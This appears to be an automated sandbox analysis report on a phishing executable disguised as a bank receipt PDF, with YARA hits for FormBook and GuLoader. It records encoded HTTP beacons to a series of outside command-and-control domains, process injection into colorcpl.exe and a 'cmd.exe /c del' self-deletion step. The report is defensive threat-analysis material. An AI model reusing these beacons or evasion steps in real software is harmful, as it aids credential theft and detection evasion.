      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=meb8sxPObMePe7P8flKxy+pWoQzvB6XBu5ErzR9pnSFmHwpkKvXtx95I7yIQNvwtHzN0&7nrLOp=h2JXJD HTTP/1.1Host: www.healthinsurancearena.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=utr1Sw3RyipqcYNbY+d8Z2Tb0M8wQrjWYhfSD+Y+PBLnRGhO3V2BTvKgLoZBbtabZvWX&7nrLOp=h2JXJD HTTP/1.1Host: www.anjin98.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=aUhQPVU+b+KmCO5n+t9BjzZYrvo3RulPNqdvt5v9fBahIfZoi9X6HoXk4Ou54UhVLO4i&7nrLOp=h2JXJD HTTP/1.1Host: www.elatedfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=6B2qrP5xTIPXUhljWLKFvclCy31c2DfKa32CVCvYSfVUhLKBGq8rlAeXXt8b11SpmRrr&7nrLOp=h2JXJD HTTP/1.1Host: www.sneakersuomo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=r2OEULnHovTrNfOCpsXB+B/EQ9/SU+ZHOlmwsAm4HEL75U8ltjEZYIavfnqmba7EJm23&7nrLOp=h2JXJD HTTP/1.1Host: www.jenniferfalconerrealtor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=tEvJTIrtwEr1z3msC1pTUGnOTVGGiUUymk4IsDmqK+5oX++y4YqyxgOU0GtdL5bqNLwd&7nrLOp=h2JXJD HTTP/1.1Host: www.hotcoa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=/g6iPkZMT+AzSmj4EvOYZViGf2+l/NC2EVsOgk6j6s7G3J7D5NbiJXA89lK55coRI4US&7nrLOp=h2JXJD HTTP/1.1Host: www.hear-aid-92727.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m&7nrLOp=h2JXJD HTTP/1.1Host: www.credit-cards-54889.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&7nrLOp=h2JXJD HTTP/1.1Host: www.lapalmaaccesible.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=CbCIRV58eRNndOWCI78oxDf6x1iSjx/hnwXmuLCBxTq8dPC8gRCwXJA+IeN3UgdkVb2H&7nrLOp=h2JXJD HTTP/1.1Host: www.3ay82.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&7nrLOp=h2JXJD HTTP/1.1Host: www.crosswalkconsulting.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=3SBeWh0owYgwrrsY56kh42PLQj3nzVyuSclHSUbMhBspMqLHRI4R/Qbff9b/gx4AUp60&7nrLOp=h2JXJD HTTP/1.1Host: www.herhustlenation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?2dCtIp=8pAXjvKhwP&7n-Lh=c9XLkKzZuO0py6g1xPdswXMX5NoX1FOKmat/CxXpy/HRSPu3IeXDT300PcCDZZ6h5UkV HTTP/1.1Host: www.furniture-61686.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?2dCtIp=8pAXjvKhwP&7n-Lh=DPf7iOV4tZbGC7wAZwygpODOxt/Orl+HPYO0G2nQwomd4kRyfSlRFlrSB1ttg/LMfS7c HTTP/1.1Host: www.hunterboots--canada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /mi94/?7n-Lh=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&2dCtIp=8pAXjvKhwP HTTP/1.1Host: www.textare.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_00405809

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000002.81576835663.000000000AA8E000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
      Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: E-dekont_pdf.exe PID: 9712, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: E-dekont_pdf.exe
      Source: E-dekont_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.81558628046.0000000004F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000002.81576835663.000000000AA8E000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
      Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.77117129709.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.81558929567.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.81556941175.0000000003240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: E-dekont_pdf.exe PID: 9712, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_00406D5F1_2_00406D5F
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_6F1323511_2_6F132351
      Source: ThrottleGearXMLHelper.dll.1.drStatic PE information: No import functions for PE file found
      Source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameThrottleGearXMLHelper.dllL vs E-dekont_pdf.exe
      Source: E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameThrottleGearXMLHelper.dllL vs E-dekont_pdf.exe
      Source: E-dekont_pdf.exe, 00000004.00000003.77030284291.000000003741E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs E-dekont_pdf.exe
      Source: E-dekont_pdf.exe, 00000004.00000002.77117367858.00000000000D3000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs E-dekont_pdf.exe
      Source: E-dekont_pdf.exe, 00000004.00000003.77115699467.0000000007184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs E-dekont_pdf.exe
      Source: E-dekont_pdf.exe, 00000004.00000003.77115133003.000000000716C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs E-dekont_pdf.exe
      Source: E-dekont_pdf.exe, 00000004.00000003.77115133003.0000000007184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs E-dekont_pdf.exe
      Source: E-dekont_pdf.exe, 00000004.00000003.77025916649.000000003726A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs E-dekont_pdf.exe
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: edgegdi.dllJump to behavior
      Source: E-dekont_pdf.exeStatic PE information: invalid certificate
      Source: E-dekont_pdf.exeVirustotal: Detection: 15%
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile read: C:\Users\user\Desktop\E-dekont_pdf.exeJump to behavior
      Source: E-dekont_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\E-dekont_pdf.exe C:\Users\user\Desktop\E-dekont_pdf.exe
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeProcess created: C:\Users\user\Desktop\E-dekont_pdf.exe C:\Users\user\Desktop\E-dekont_pdf.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\E-dekont_pdf.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeProcess created: C:\Users\user\Desktop\E-dekont_pdf.exe C:\Users\user\Desktop\E-dekont_pdf.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exeJump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\E-dekont_pdf.exe"Jump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile created: C:\Users\user\AppData\Roaming\UundvrlighedenJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nssEC3A.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@8/10@20/18
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_004021AA LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,1_2_004021AA
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeCode function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404AB5
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9888:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9888:120:WilError_03
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeFile written: C:\Users\user\AppData\Roaming\DORME.iniJump to behavior
      Source: C:\Users\user\Desktop\E-dekont_pdf.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VenerisJump to behavior
      Source: E-dekont_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: colorcpl.pdbGCTL source: E-dekont_pdf.exe, 00000004.00000003.77115699467.0000000007180000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000003.77115133003.000000000716C000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000002.77117367858.00000000000D0000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: colorcpl.pdb source: E-dekont_pdf.exe, 00000004.00000003.77115699467.0000000007180000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000003.77115133003.000000000716C000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000002.77117367858.00000000000D0000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: mshtml.pdb source: E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: E-dekont_pdf.exe, 00000004.00000003.77030284291.00000000372F1000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000003.77025916649.0000000037147000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: E-dekont_pdf.exe, 00000004.00000003.77030284291.00000000372F1000.00000004.00000020.00020000.00000000.sdmp, E-dekont_pdf.exe, 00000004.00000003.77025916649.0000000037147000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: E-dekont_pdf.exe, 00000004.00000001.76878880686.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ExternalDLL\ROGGamingCenterXMLHelper\obj\x64\Release\ThrottleGearXMLHelper.pdb<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><g color="#000" font-weight="400" font-family="sans-serif" fill="#474747"><path d="M1.032 1.032V15H15V1.03zm2 2H13V13H3.03z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" overflow="visible"/><path d="M9.536 8.3c-.467-.065-1.046-.105-1.532.275-.403.315-.777.713-1.105 1.017-.328.305-.652.44-.586.44H2.47v1h3.844c.582 0 .9-.368 1.264-.705.364-.337.731-.721 1.043-.965.106-.083.406-.124.779-.072.373.051.707.18 1.102.18.146 0 .215.034.324.126.108.092.23.254.365.448.135.193.28.417.498.62.218.204.546.383.922.383h.86v-1h-.86c-.1 0-.14-.02-.238-.113-.099-.092-.22-.26-.36-.46-.14-.202-.3-.436-.539-.64a1.517 1.517 0 00-.972-.365c-.033 0-.499-.105-.965-.17zM5.454 3.885c-.86 0-1.569.708-1.569 1.569 0 .86.708 1.568 1.569 1.568.86 0 1.568-.708 1.568-1.568 0-.86-.708-1.569-1.568-1.569zm0 1c.32 0 .568.249.568.569a.56.56 0 01-.568.568.561.561 0 01-.569-.568c0-.32.249-.569.569-.569z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" overflow="visible"/></g></svg> source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ExternalDLL\ROGGamingCenterXMLHelper\obj\x64\Release\ThrottleGearXMLHelper.pdb source: E-dekont_pdf.exe, 00000001.00000002.77085083526.000000000041E000.00000004.00000001.01000000.00000003.sdmp, E-dekont_pdf.exe, 00000001.00000002.77087521350.0000000002A5C000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000001.00000002.77089327634.0000000007F17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.77085989629.0000000000696000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
